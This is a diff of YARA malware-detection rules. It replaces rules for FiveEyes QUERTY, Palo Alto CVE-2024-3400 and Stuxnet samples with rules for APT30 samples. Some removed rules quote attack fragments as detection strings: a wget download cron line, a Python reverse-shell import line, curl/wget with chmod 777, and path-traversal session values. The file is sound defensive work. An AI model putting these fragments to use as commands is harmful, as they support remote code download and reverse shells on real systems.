+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "503c71de-1bc5-5690-944c-a60917a4da09"
-		date = "2015-01-18"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L193-L216"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L446-L466"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "597082f05bfd3225587d480c30f54a7a1326a892"
-		logic_hash = "7d2617e0ee41ea475608757594cba8ae93f2dbb09b5d01d1fa3324b32ebb8aa0"
+		hash = "355436a16d7a2eba8a284b63bb252a8bb1644751"
+		logic_hash = "d20f1d1b7b43defc36c7b1f99f14ed9e73e770b6f43d0ad92110cf9178b35b15"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii
-		$s1 = "<name>20120.dll</name>" fullword ascii
-		$s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
-		$s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
-		$s4 = "<platform type=\"1\">" fullword ascii
-		$s5 = "</plugin>" fullword ascii
-		$s6 = "</pluginConfig>" fullword ascii
-		$s7 = "<pluginConfig>" fullword ascii
-		$s8 = "</platform>" fullword ascii
-		$s9 = "</lpConfig>" fullword ascii
-		$s10 = "<lpConfig>" fullword ascii
+		$s0 = "w.km-nyc.com" fullword ascii
+		$s1 = "tscv.exe" fullword ascii
+		$s2 = "Exit/app.htm" ascii
+		$s3 = "UBD:\\D" ascii
+		$s4 = "LastError" ascii
+		$s5 = "MicrosoftHaveAck" ascii
+		$s7 = "HHOSTR" ascii
+		$s20 = "XPL0RE." ascii
 
 	condition:
-		all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Fiveeyes_QUERTY_Malwaresig_20121_Cmddef
+rule SIGNATURE_BASE_APT30_Generic_G : FILE
 {
 	meta:
-		description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2deb73f7-372e-5d29-a077-431ab1967d93"
-		date = "2015-01-18"
+		id = "34269de3-4559-58a5-a621-0ad72857dc9e"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.spiegel.de/media/media-35668.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_querty_fiveeyes.yar#L218-L251"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L468-L489"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907"
-		logic_hash = "d73f0e964bd57ed3a2cd782ac204a2b82a9b334e33d64dc61e6414654d7c38d3"
+		hash = "1612b392d6145bfb0c43f8a48d78c75f"
+		hash = "53f1358cbc298da96ec56e9a08851b4b"
+		hash = "c2acc9fc9b0f050ec2103d3ba9cb11c0"
+		hash = "f18be055fae2490221c926e2ad55ab11"
+		logic_hash = "6926d73839958acd06835c1943edb150a0f60cdc269fac053531a0e0483e0521"
 		score = 75
-		quality = 83
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii
-		$s1 = "<message>Failed to get File Time</message>" fullword ascii
-		$s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii
-		$s3 = "<message>Failed to set File Time</message>" fullword ascii
-		$s4 = "</commands>" fullword ascii
-		$s5 = "<commands>" fullword ascii
-		$s6 = "</version>" fullword ascii
-		$s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii
-		$s8 = "<message>No Comms. with Driver</message>" fullword ascii
-		$s9 = "</error>" fullword ascii
-		$s10 = "<message>Invalid File Size</message>" fullword ascii
-		$s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii
-		$s12 = "<message>File Size Mismatch</message>" fullword ascii
-		$s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii
-		$s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii
-		$s15 = "<dllDepend>None</dllDepend>" fullword ascii
-		$s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii
-		$s17 = "<rightsRequired>None</rightsRequired>" fullword ascii
-		$s18 = "<minorType>0</minorType>" fullword ascii
-		$s19 = "<code>00001002</code>" fullword ascii
-		$s20 = "<code>00001001</code>" fullword ascii
+		$s0 = "%s\\%s\\%s=%s" fullword ascii
+		$s1 = "Copy File %s OK!" fullword ascii
+		$s2 = "%s Space:%uM,FreeSpace:%uM" fullword ascii
+		$s4 = "open=%s" fullword ascii
+		$s5 = "Maybe a Encrypted Flash Disk" fullword ascii
+		$s12 = "%04u-%02u-%02u %02u:%02u:%02u" fullword ascii
 
 	condition:
-		12 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_APT_UTA028_Forensicartefacts_Paloalto_CVE_2024_3400_Apr24_1 : SCRIPT CVE_2024_3400
+rule SIGNATURE_BASE_APT30_Sample_19 : FILE
 {
 	meta:
-		description = "Detects forensic artefacts of APT UTA028 as found in a campaign exploiting the Palo Alto CVE-2024-3400 vulnerability"
-		author = "Florian Roth"
-		id = "32cf18ff-784d-5849-87f8-14ede7315188"
-		date = "2024-04-15"
-		modified = "2024-04-18"
-		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L2-L25"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-03"
+		modified = "2023-01-06"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L491-L517"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1261eecca520daa0619859a45d2289d2c23c73be55e1a3849d2032a38e137f4d"
-		score = 70
+		hash = "cfa438449715b61bffa20130df8af778ef011e15"
+		logic_hash = "9127ae31c5b818a2759f9d33c74c8631079539e7fa8e49e5514b016df2624065"
+		score = 75
 		quality = 85
-		tags = "SCRIPT, CVE-2024-3400"
+		tags = "FILE"
 
 	strings:
-		$x1 = "cmd = base64.b64decode(rst.group"
-		$x2 = "f.write(\"/*\"+output+\"*/\")"
-		$x3 = "* * * * * root wget -qO- http://"
-		$x4 = "rm -f /var/appweb/sslvpndocs/global-protect/*.css"
-		$x5a = "failed to unmarshal session(../"
-		$x5b = "failed to unmarshal session(./../"
-		$x6 = "rm -rf /opt/panlogs/tmp/device_telemetry/minute/*" base64
-		$x7 = "$(uname -a) > /var/" base64
+		$s0 = "C:\\Program Files\\Common Files\\System\\wab32" fullword ascii
+		$s1 = "%s,Volume:%s,Type:%s,TotalSize:%uMB,FreeSize:%uMB" fullword ascii
+		$s2 = "\\TEMP\\" ascii
+		$s3 = "\\Temporary Internet Files\\" ascii
+		$s5 = "%s TotalSize:%u Bytes" fullword ascii
+		$s6 = "This Disk Maybe a Encrypted Flash Disk!" fullword ascii
+		$s7 = "User:%-32s" fullword ascii
+		$s8 = "\\Desktop\\" ascii
+		$s9 = "%s.%u_%u" fullword ascii
+		$s10 = "Nick:%-32s" fullword ascii
+		$s11 = "E-mail:%-32s" fullword ascii
+		$s13 = "%04u-%02u-%02u %02u:%02u:%02u" fullword ascii
+		$s14 = "Type:%-8s" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule SIGNATURE_BASE_EXPL_Paloalto_CVE_2024_3400_Apr24_1 : CVE_2024_3400
+rule SIGNATURE_BASE_APT30_Generic_E_V2 : FILE
 {
 	meta:
-		description = "Detects characteristics of the exploit code used in attacks against Palo Alto GlobalProtect CVE-2024-3400"
-		author = "Florian Roth"
-		id = "1bcf0415-5351-5e09-ab93-496e8dc47c92"
-		date = "2024-04-15"
-		modified = "2025-03-21"
-		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L27-L46"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "40897687-fb17-568e-9907-e9588a53bbe0"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L519-L535"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ebc94a07b189a2d2dd252b5079fa494162739678fd2ca742e6877189a140da9"
-		score = 70
+		hash = "eca53a9f6251ddf438508b28d8a483f91b99a3fd"
+		logic_hash = "25a7e5780f56b4f9cfb76494926c446a39a88bef2cda82b31e6de2b85c5edbda"
+		score = 75
 		quality = 85
-		tags = "CVE-2024-3400"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "SESSID=../../../../opt/panlogs/"
-		$x2 = "SESSID=./../../../../opt/panlogs/"
-		$sa1 = "SESSID=../../../../"
-		$sa2 = "SESSID=./../../../../"
-		$sb2 = "${IFS}"
+		$s0 = "Nkfvtyvn}duf_Z}{Ys" fullword ascii
+		$s1 = "Nkfvtyvn}*Zrswru1i" fullword ascii
+		$s2 = "Nkfvtyvn}duf_Z}{V" fullword ascii
+		$s3 = "Nkfvtyvn}*ZrswrumT\\b" fullword ascii
 
 	condition:
-		1 of ( $x* ) or ( 1 of ( $sa* ) and $sb2 )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_LNX_Base64_Download_Exec_Apr24 : SCRIPT
+rule SIGNATURE_BASE_APT30_Sample_20 : FILE
 {
 	meta:
-		description = "Detects suspicious base64 encoded shell commands used for downloading and executing further stages"
-		author = "Paul Hager"
-		id = "df8dddef-3c49-500c-abc8-7f7de5aa69ae"
-		date = "2024-04-18"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L48-L65"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "91246101-246b-5da9-9e55-7f361d1f6437"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L537-L557"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "90b7781812b4078550b0d66ba020b3bb0a8217f2de03492af98db6c619f31929"
+		hash = "b1c37632e604a5d1f430c9351f87eb9e8ea911c0"
+		logic_hash = "f94cbd4b8e7ba302db9ac4ef3617bd68aa0aa1ee3cfc6dfee4621223bbdae3c5"
 		score = 75
 		quality = 85
-		tags = "SCRIPT"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "curl http" base64
-		$sa2 = "wget http" base64
-		$sb1 = "chmod 777 " base64
-		$sb2 = "/tmp/" base64
+		$s0 = "dizhi.gif" fullword ascii
+		$s2 = "Mozilla/u" ascii
+		$s3 = "XicrosoftHaveAck" ascii
+		$s4 = "flyeagles" ascii
+		$s10 = "iexplore." ascii
+		$s13 = "WindowsGV" fullword ascii
+		$s16 = "CatePipe" fullword ascii
+		$s17 = "'QWERTY:/webpage3" fullword ascii
 
 	condition:
-		1 of ( $sa* ) and all of ( $sb* )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_PY_Import_Statement_Apr24_1
+rule SIGNATURE_BASE_APT30_Sample_21 : FILE
 {
 	meta:
-		description = "Detects suspicious Python import statement and socket usage often found in Python reverse shells"
-		author = "Florian Roth"
-		id = "8e05f9a1-40a8-5d01-9e45-8779b0ff7a45"
-		date = "2024-04-15"
-		modified = "2025-03-21"
-		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L67-L79"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "72005b40-91f7-5661-9478-8680f999b245"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L559-L575"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d5c199d9c3e449ca282f0ca91c94ac783709299b3489f7cec38177a2f843b504"
-		score = 65
+		hash = "d315daa61126616a79a8582145777d8a1565c615"
+		logic_hash = "e3e431bb6915d99b8aa1915419b60ba47372005b9b4994a924746a91bad80310"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "import sys,socket,os,pty;s=socket.socket("
+		$s0 = "Service.dll" fullword ascii
+		$s1 = "(%s:%s %s)" fullword ascii
+		$s2 = "%s \"%s\",%s %s" fullword ascii
+		$s5 = "Proxy-%s:%u" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_LNX_Base64_Exec_Apr24 : SCRIPT CVE_2024_3400 FILE
+rule SIGNATURE_BASE_APT30_Sample_22 : FILE
 {
 	meta:
-		description = "Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)"
-		author = "Christian Burkard"
-		id = "2da3d050-86b0-5903-97eb-c5f39ce4f3a3"
-		date = "2024-04-18"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L81-L105"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6c1b3dd2-4383-51a2-9185-2365a4d1e784"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L577-L595"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e96fb7c8faac12c1f0210689f2b3a7903b42a543b97ddff11298e5ae13cae80b"
+		hash = "0d17a58c24753e5f8fd5276f62c8c7394d8e1481"
+		logic_hash = "88a45d248eba7b9776e2e7d345d2948e00a94a7e359acb89d1943be55ab342ad"
 		score = 75
 		quality = 85
-		tags = "SCRIPT, CVE-2024-3400, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "curl http://" base64
-		$s2 = "wget http://" base64
-		$s3 = ";chmod 777 " base64
-		$mirai = "country="
-		$fp1 = "<html"
-		$fp2 = "<?xml"
+		$s1 = "(\\TEMP" fullword ascii
+		$s2 = "Windows\\Cur" fullword ascii
+		$s3 = "LSSAS.exeJ" fullword ascii
+		$s4 = "QC:\\WINDOWS" fullword ascii
+		$s5 = "System Volume" fullword ascii
+		$s8 = "PROGRAM FILE" fullword ascii
 
 	condition:
-		filesize < 800KB and 1 of ( $s* ) and not $mirai and not 1 of ( $fp* )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Stuxnet_Malware_1
+rule SIGNATURE_BASE_APT30_Generic_F : FILE
 {
 	meta:
-		description = "Stuxnet Sample - file malware.exe"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1f475dc3-ebb3-508f-b696-3d9ea270b13d"
-		date = "2016-07-09"
+		id = "cff8b921-9afc-5a52-84cb-825de33fc86e"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L10-L41"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L597-L615"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8caa6bddef3c05e572ef342513190832900dcb1a7a56589ed7df48b3c6992ed1"
+		logic_hash = "4997b52e0cc12a1a0c84cec3565dd9e6b486ccef4eb8791c566c7a534d36e3ff"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9c891edb5da763398969b6aaa86a5d46971bd28a455b20c2067cb512c9f9a0f8"
+		hash1 = "09010917cd00dc8ddd21aeb066877aa2"
+		hash2 = "4c10a1efed25b828e4785d9526507fbc"
+		hash3 = "b7b282c9e3eca888cbdb5a856e07e8bd"
+		hash4 = "df1799845b51300b03072c6569ab96d5"
 
 	strings:
-		$op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 }
-		$op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 }
-		$op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd }
+		$s0 = "\\~zlzl.exe" ascii
+		$s2 = "\\Internet Exp1orer" ascii
+		$s3 = "NodAndKabIsExcellent" fullword ascii
 
 	condition:
-		all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Stuxnet_Malware_2 : FILE
+rule SIGNATURE_BASE_APT30_Sample_23 : FILE
 {
 	meta:
-		description = "Stuxnet Sample"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2865353c-44c5-5280-878b-daadcef017b8"
-		date = "2016-07-09"
+		id = "9366dd34-9967-5b40-935e-4b0d8f2f5e9e"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L43-L57"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L617-L637"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ecf992f8fd38b1ab3e05bfe05f260bcaf617f168484477aa81acb9b517b9f3e7"
+		hash = "9865e24aadb4480bd3c182e50e0e53316546fc01"
+		logic_hash = "64ff048b061431e0834ac40bfccb0d9e8ca60ffb022578ef910e6ffc511be6ed"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802"
 
 	strings:
-		$s1 = "\\SystemRoot\\System32\\hal.dll" wide
-		$s2 = "http://www.jmicron.co.tw0" fullword ascii
+		$s0 = "hostid" ascii
+		$s1 = "\\Window" ascii
+		$s2 = "%u:%u%s" fullword ascii
+		$s5 = "S2tware\\Mic" ascii
+		$s6 = "la/4.0 (compa" ascii
+		$s7 = "NameACKernel" fullword ascii
+		$s12 = "ToWideChc[lo" fullword ascii
+		$s14 = "help32SnapshotfL" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Stuxnet_Dll : FILE
+rule SIGNATURE_BASE_APT30_Sample_24 : FILE
 {
 	meta:
-		description = "Stuxnet Sample - file dll.dll"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92d812a6-2622-56e4-96c5-eb65ab7055b9"
-		date = "2016-07-09"
+		id = "aed2201d-b557-56ec-aa53-fff5b1e17dbd"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L59-L72"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L639-L658"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c192153c268fdd330d3b9e2eb0d8383bd50ce6d036409f0cc0c9273ba8201b3"
+		hash = "572caa09f2b600daa941c60db1fc410bef8d1771"
+		logic_hash = "9d550fd0225f1c4e3b16ae53648644d7bb5c80e99e2a1a3d199e51c7219c2e94"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9e392277f62206098cf794ddebafd2817483cfd57ec03c2e05e7c3c81e72f562"
 
 	strings:
-		$s1 = "SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!" fullword ascii
+		$s1 = "dizhi.gif" fullword ascii
+		$s3 = "Mozilla/4.0" fullword ascii
+		$s4 = "lyeagles" fullword ascii
+		$s6 = "HHOSTR" ascii
+		$s7 = "#MicrosoftHaveAck7" ascii
+		$s8 = "iexplore." fullword ascii
+		$s17 = "ModuleH" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and $s1
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Stuxnet_Shortcut_To : FILE
+rule SIGNATURE_BASE_APT30_Sample_25 : FILE
 {
 	meta:
-		description = "Stuxnet Sample - file Copy of Shortcut to.lnk"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "582ab12b-808e-5d5c-ba36-3bb987c4c552"
-		date = "2016-07-09"
+		id = "8b2f2ba2-e9cc-5b3c-8af9-4217d662bc3f"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L74-L87"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L660-L679"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a8119500d38bcfc60620265386f31899e586f62e1ceeeff365fd0018ab39c30e"
+		hash = "44a21c8b3147fabc668fee968b62783aa9d90351"
+		logic_hash = "86945188f888762ae585463df7cfb6e5fed30d0fcfcca4e642aedf07a0193ae7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "801e3b6d84862163a735502f93b9663be53ccbdd7f12b0707336fecba3a829a2"
 
 	strings:
-		$x1 = "\\\\.\\STORAGE#Volume#_??_USBSTOR#Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_PMAP#5B6B098B97BE&0#{53f56307-b6bf-11d0-94f2-00a0c" wide
+		$s1 = "C:\\WINDOWS" fullword ascii
+		$s2 = "aragua" fullword ascii
+		$s4 = "\\driver32\\7$" ascii
+		$s8 = "System V" fullword ascii
+		$s9 = "Compu~r" fullword ascii
+		$s10 = "PROGRAM L" fullword ascii
+		$s18 = "GPRTMAX" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x004c and filesize < 10KB and $x1
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Stuxnet_Malware_3 : FILE
+rule SIGNATURE_BASE_APT30_Sample_26 : FILE
 {
 	meta:
-		description = "Stuxnet Sample - file ~WTR4141.tmp"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1b0b301a-bf29-5080-a7d6-4d5f389bdf50"
-		date = "2016-07-09"
+		id = "aa80a142-c8fc-504e-b475-e9838607bec6"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L89-L110"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L681-L700"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d8c546fb74b419d46bab855fa07a55833ab0a23eb4081ce24a5d4ab0e4bf09dc"
+		hash = "e26588113417bf68cb0c479638c9cd99a48e846d"
+		logic_hash = "b585687c071dc2dddb888906f47b7af6bc7683e902d3afb42364896e800fac5c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6bcf88251c876ef00b2f32cf97456a3e306c2a263d487b0a50216c6e3cc07c6a"
-		hash2 = "70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b"
 
 	strings:
-		$x1 = "SHELL32.DLL.ASLR." fullword wide
-		$s1 = "~WTR4141.tmp" fullword wide
-		$s2 = "~WTR4132.tmp" fullword wide
-		$s3 = "totalcmd.exe" fullword wide
-		$s4 = "wincmd.exe" fullword wide
-		$s5 = "http://www.realtek.com0" fullword ascii
-		$s6 = "{%08x-%08x-%08x-%08x}" fullword wide
+		$s1 = "forcegue" fullword ascii
+		$s3 = "Windows\\Cur" fullword ascii
+		$s4 = "System Id" fullword ascii
+		$s5 = "Software\\Mic" fullword ascii
+		$s6 = "utiBy0ToWideCh&$a" fullword ascii
+		$s10 = "ModuleH" fullword ascii
+		$s15 = "PeekNamed6G" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and ( $x1 or 3 of ( $s* ) ) ) or ( 5 of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Stuxnet_Malware_4 : FILE
+rule SIGNATURE_BASE_APT30_Generic_D : FILE
 {
 	meta:
-		description = "Stuxnet Sample"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd3fa395-15f1-5a11-9740-03b897e4620b"
-		date = "2016-07-09"
+		id = "9b8d8a60-a357-5cfd-8ff1-6264144ad7be"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
